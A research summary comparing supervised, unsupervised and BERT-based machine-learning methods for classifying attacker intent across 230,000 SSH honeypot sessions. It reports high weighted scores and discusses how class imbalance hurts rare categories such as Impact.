Weighted precision 0.999 and recall 0.994 on the test set.
230,000 attacks.
Seven adversary intents.
We analyzed 230,000 real attack sessions collected by decoy servers and compared several machine-learning methods for recognizing what each attacker was trying to do.
Turn unstructured commands into attacker intent.
An SSH honeypot is a decoy server that records the commands sent by attackers. Reading 230,000 sessions by hand is unrealistic, so we tested whether machine learning could summarize the attackers' goals.
We used seven categories based on MITRE ATT&CK, including system discovery, persistence, execution, and impact. One session can contain several goals, so a model may need to assign more than one label.
Prepare the attack data before training a model.
We decoded 90,026 hidden shell scripts, normalized timestamps, separated commands into useful terms, and removed noisy variables and symbols. A statistical text representation then reduced roughly 300,000 candidate terms to 90 useful features.
System discovery and persistence dominated the dataset, while the Impact category appeared only 27 times. This imbalance became the main weakness of every model: common behavior was easy to learn, but rare behavior was not.
High scores can hide weak categories.
We first tested Random Forest, SVM, and Logistic Regression. Random Forest and SVM performed very well on the common attack categories, and additional parameter tuning produced only a small improvement.
RBF kernel, C=100, gamma=scale; approximately 1.48% above baseline.
Neither result erased the imbalance problem. Impact remained difficult because its support was vanishingly small. Weighted averages describe performance on the dominant classes well, but they should not be mistaken for uniform reliability across every intent.
A good metric did not guarantee useful groups.
We also asked unsupervised models to group similar sessions without using labels. Their mathematical scores looked strong, but visual inspection showed one dominant group and heavy overlap between attacker behaviors.
Some communities were interpretable-BusyBox and mount commands suggested IoT-oriented activity, while chmod, wget, and SSH indicated file modification and persistence-but the overall segmentation was not clean enough to treat clusters as distinct tactics.
The most valuable result was the disagreement between a high silhouette score and weak semantic separation. Validation metrics, visual structure, and domain interpretation all had to be considered together.
A language model added context, but not missing data.
Finally, we adapted BERT, a pretrained language model, to assign several attack labels to one session. We kept its existing language knowledge fixed and trained a small classification layer on top.
Precision 0.9974, recall 0.9927, and ROC-AUC 0.9971.
Harmless activity remained harder to distinguish because of limited examples and imbalance.
The experiment showed the value of semantic representations for command sequences, but it also reinforced a broader lesson: a sophisticated model does not compensate for missing class support.
The comparison mattered more than the best score.
Classical supervised models were already highly effective on well-represented intents. Unsupervised methods surfaced broad command communities but struggled to produce semantically distinct attack categories. BERT captured multi-label semantics effectively, while its weakest class exposed the same imbalance found across the study.
The practical next steps are not simply “use a larger model”: introduce domain-aware features and network context, rebalance rare intents, test on broader sources, and evaluate whether results generalize beyond the original June 2019–March 2020 honeypot window.